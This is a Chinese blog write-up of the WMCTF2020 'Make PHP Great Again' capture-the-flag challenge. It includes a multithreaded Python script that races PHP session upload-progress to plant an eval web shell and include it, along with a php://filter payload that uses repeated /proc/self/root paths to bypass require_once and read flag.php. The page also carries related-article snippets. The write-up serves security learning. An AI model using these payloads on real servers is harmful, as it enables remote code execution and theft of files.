[WMCTF2020]Make PHP Great Again

最新推荐文章于 2022-09-14 12:06:02 发布
最新推荐文章于 2022-09-14 12:06:02 发布
阅读量1.2k 收藏 3
点赞数
分类专栏: # ctf做题记录 RCE php问题函数 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/117256082
版权

源码

<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
  require_once $_GET['file'];
}

解法一

这一看就是session.upload_progress文件包含

import io
import requests
import threading
sessid = 'bbbbbbb'
data = {"cmd":"system('cat flag.php');"}
def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post( 'http://29990843-ca1b-41bd-b564-78e2b6b86557.node3.buuoj.cn/', data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'}, files={'file': ('1.txt',f)}, cookies={'PHPSESSID': sessid} )
def read(session):
    while True:
        resp = session.post('http://29990843-ca1b-41bd-b564-78e2b6b86557.node3.buuoj.cn/?file=/tmp/sess_'+sessid,data=data)
        if '1.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            print("[+++++++++++++]retry")
if __name__=="__main__":
    event=threading.Event()
    with requests.session() as session:
        for i in range(1,30): 
            threading.Thread(target=write,args=(session,)).start()

        for i in range(1,30):
            threading.Thread(target=read,args=(session,)).start()
    event.set()

在这里插入图片描述

解法二

看了wp才知道解法一是非预期,预期:
PHP最新版的小Trick, require_once包含的软链接层数较多时once的hash匹配会直接失效造成重复包含
解释
payload
?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
在这里插入图片描述
解码的flag

fmyyy1
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Make Conestoga Great Again-crx插件
04-05
语言:English 基本级别扩展 默认的锥表时间表不显示特定的上课时间。 该扩展将带回您的上课时间。 如果您想在Conestoga学院网站上获得更多修复,请给我发送电子邮件。
Make Flowdock Great Again-crx插件
04-05
语言:English (UK) 将Flowdock对话带回到没有太多图标的时代。 使Flowdock线程看起来更像以前一样,没有杂音,没有所有这些图标。
Make News Great Again-crx插件
04-07
语言:English (UK) 把讨厌的新闻变成有趣的新闻 访问您最喜欢的新闻站点。 突然之间,它们变得比以前更无聊了。
Make Reddit great again-crx插件
04-06
语言:English 注入单个css规则,将来自/ r / the_donald / r /全部将使用此CSS行隐藏/ r / the_donald: [data-supreddit =“the_donald”] { 显示:无;
WMCTF_2020官方WriteUp.pdf
03-15
WMCTF_2020官方WriteUp 高清PDF版
BUUCTF--[WMCTF2020]Make PHP Great Again
qq_46263951的博客
08-11 1043
进入页面后给出一段代码 <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 这里有一个require_once函数之前没有见过 require_once语句和 require 语句完全相同,唯一区别是 PHP 会检查该文件是否已经被包含过,如果是则不会再次包含。 equire_once() 为了避免重复加载..
wmctf2020 Make PHP Great Again
snowlyzz的博客
09-14 266
一题双解
Make Christmas Great Again-crx插件
04-06
语言:English 通过将圣诞节快乐传播到涵盖2019年大选的互联网的每个角落,再次使圣诞节变得美好。 投票给圣诞老人! 厌倦了选举,只想过圣诞节吗? 让圣诞节再次变得伟大是一个谷歌浏览器Chrome插件,通过将圣诞节快乐传播到互联网的每个角落来覆盖即将到来的圣诞节诞生(选举),从而劫持了网络上的2019年英国大选讨论。 安装该插件并允许我们的“让圣诞节再次精彩”广告系列将您对选举的所有提及都转化为更具节日性的内容,从而使您从永无止境的政治报道中解脱出来。 圣诞老人会很高兴。 任何问题? 给我们打电话:hello@lolly.co!
BUU Dest0g3 520迎新赛 WEB writeup
weixin_43610673的博客
05-29 2026
WEB phpdest <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once($_GET['file']); } require_once 绕过不能重复包含文件的限制 /?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/r
[WMCTF2020]Make PHP Great Again 2.0
nigo134的博客
06-18 520
进入页面给出代码 这里有个require_once()函数需要了解一下,如果require_once包含过一次flag.php再次出现则不会执行发现require文件时,在对软链接的操作上存在一些缺陷,似乎并不会进行多次解析获取真实路径。/proc/self指向当前进程的/proc/pid/ /proc/self/root/是指向/的符号链接使用伪协议来读取flag,构造payload: ?file=php://filter/read=convert.base64-encode/resource=/pr
BUUCTF--[WMCTF2020]Make PHP Great Again 2.0
qq_46263951的博客
08-18 615
进入页面给出代码 <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 这里有个require_once()函数需要了解一下,如果require_once包含过一次flag.php再次出现则不会执行 发现require文件时,在对软链接的操作上存在一些缺陷,似乎并不会进行多次解析获取真实路径。 /proc/sel..
[WMCTF2020]Make PHP Great Again非预期解原因
azraelxuemo的博客
12-01 368
当时这个题出现了一个这样的非预期解 ?file=php://filter/convert.base64-encode/resource=/nice/../../proc/self/cwd/flag.php 以及这样回失败 ?file=php://filter/convert.base64-encode/resource=/proc/self/cwd/flag.php 这里涉及php这样的一个trunk,我是调试源码发现的 环境配置 unsucess.php <?php include "flag.
[WMCTF2020]Make PHP Great Again 软连接绕过
qq_54929891的博客
05-23 846
<?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 打开题目一看,这么几行代码,就这? 话不多说直接伪协议读取flag.php php://filter/read=convert.base64-encode/resource=flag.php 欸嘿,啥都没出来,也没报错说什么有过滤??或许这个函数有可能不一样,去.
buu-[WMCTF2020]Make PHP Great Again
qaq517384的博客
10-26 232
考点: 绕过require_once() 打开环境就是源码 <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 第一反应是去百度绕过require_once(),毕竟见识小,小本本记一下 php源码分析 require_once 绕过不能重复包含文件的限制 /root/proc/self再多放几个也不是问题 payloa
CTF_Web长征路细刷题笔记
Mark的博客
01-06 4307
文件包含一、2018 XCTF FINALS —— babyphp二、 一、2018 XCTF FINALS —— babyphp 0x01信息收集 打开环境可以看到几个关键点,首先便是看到有两个可控变量 1: $_GET[‘function’] 执行函数 2: $_POST[‘name’] 可控制session值内容 其次又看到include($file);存在文件包含,ini_set限定了文件包含目录 最后可见call_user_func($func,$_GET)这个函
-------已搬运--------BUUCTF:WMCTF2020]Make PHP Great Again --文件包含 --- require_once php7.4 的trick
Zero_Adam的博客
05-03 593
一、自己做: 代码简单, <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once $_GET['file']; } 用filter读取,能够读取到file=../../../../../etc/passwd。用上filter等等,就是读取不到flag.php。 然后我就想到了之前的 文件包含漏洞的。那个上传一个文件,然后包含自己,使得PHP程序运行不完,然后临
在你为完成练习 8-9 而编写的程序中,编写一个名为make_great()的函数,对魔术师列
最新发布
12-13
编写一个名为make_great()的函数,对魔术师进行修改。在完成练习 8-9 的程序中,我会编写一个make_great()函数来对魔术师进行修改。该函数将接受一个魔术师列表作为参数,然后遍历列表,对每个魔术师的名字进行修改...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值